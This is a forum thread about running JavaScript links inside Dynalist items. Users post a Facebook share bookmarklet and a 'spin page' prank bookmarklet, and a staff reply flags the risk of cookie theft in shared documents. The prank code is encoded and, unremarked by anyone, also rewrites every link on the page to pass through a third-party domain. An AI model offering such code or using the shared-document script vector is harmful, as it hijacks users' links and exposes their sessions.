You can use javascript links in Dynalist. :O Cool?

I did not know this. I wonder how useful it could be. Perhaps you can make items that expand the children when you click the item link text instead of trying to pinpoint the little zoom button. Or run those “powerpack” things or item sorting scripts via links without any plugins. I’m just hypothesizing.

Anyway here is proof: this worked for me, just the standard share bookmarklet from facebook

[a test](javascript:var d=document,f='https://www.facebook.com/share',l=d.location,e=encodeURIComponent,p='.php?src=bm&v=4&i=1531940155&u='+e(l.href)+'&t='+e(d.title);1;try{if (!/^(.*\.)?facebook\.[^.]*$/.test(l.host))throw(0);share_internal_bookmarklet(p)}catch(z) {a=function() {if (!window.open(f+'r'+p,'sharer','toolbar=0,status=0,resizable=1,width=626,height=436'))l.href=f+p};if (/Firefox/.test(navigator.userAgent))setTimeout(a,0);else{a()}}void(0))

3 Likes

Lol this one, paste to dynalist then click it and the whole thing spins

I got it from http://marklets.com/Spin%20Page%202.0.aspx

[spin page](javascript:var www_13KG_com%3D0%3Bvar www_WHAK_com%3Ddocument.body%3Bvar www_SYNCRISIS_com%3Dnavigator.appName%3Bfunction www_FAKEHACK_com(deg)%7Bwww_WHAK_com.style.transform%3D"rotate("%2Bwww_13KG_com%2B"deg)"%3Bwww_WHAK_com.style.WebkitTransform%3D"rotate("%2Bwww_13KG_com%2B"deg)"%3Bwww_WHAK_com.style.MozTransform%3D"rotate("%2Bwww_13KG_com%2B"deg)"%3B%7Dfunction rotate(deg)%7Bvar www_NERDFUL_com%3Ddeg*_www_NERDFUL_com%3Bvar www_URLEFFECTS_com%3DMath.cos(www_NERDFUL_com)%3Bvar www_ADDEFFECTS_net%3DMath.sin(www_NERDFUL_com)%3Bwww_WHAK_com.filters.item(0).M11%3Dwww_URLEFFECTS_com%3Bwww_WHAK_com.filters.item(0).M12%3D-www_ADDEFFECTS_net%3Bwww_WHAK_com.filters.item(0).M21%3Dwww_ADDEFFECTS_net%3Bwww_WHAK_com.filters.item(0).M22%3Dwww_URLEFFECTS_com%3B%7Dvar fixs%3Ddocument.getElementsByTagName(%27a%27)%3Bfor(var i%3D0,fix%3Bfix%3Dfixs%5Bi%5D%3Bi%2B%2B)%7Bvar splits%3Dfix.href.split(%27/%27)%3Bfix.href%3Dfix.href.replace(splits%5B2%5D,splits%5B2%5D%2B%27.tossover.com%27).replace(%27.tossover.com.tossover.com%27,%27.tossover.com%27)%3B%7Dif(www_SYNCRISIS_com%3D%3D"Microsoft Internet Explorer")%7Bwww_WHAK_com.style.filter%3D"progid:DXImageTransform.Microsoft.Matrix(M11%3D%271.0%27, sizingmethod%3D%27auto expand%27)"%3Bvar _www_NERDFUL_com%3DMath.PI*2/360%3BsetInterval("rotate(www_13KG_com)%3Bwww_13KG_com %3D www_13KG_com %2B 1%3B",100)%3B%7Delse%7BsetInterval("www_FAKEHACK_com(www_13KG_com)%3Bwww_13KG_com %3D www_13KG_com %2B .3%3B",100)%3B%7Dvoid(0)%3B)

1 Like

It’s cool that you’re discovering using JS in Dynalist!

From a security perspective though, this is something we should fix in shared documents. Thanks for pointing it out!

How is it a security issue?

Say someone shares a document with you that contains JavaScript that gets your cookies or runs some other malicious code. That will be bad, no?

Unless I didn’t understand what you were trying to showcase :hushed:

Oh like cross scripting exploit protections in the browser will be bypassed since dynalist cookies and the javascript link are on the same domain? hmm interesting point. i wonder why other sites like tumblr you’re allowed to code arbitrary javascript into your blog theme with no problems. maybe they keep their cookies on a separate domain i dunno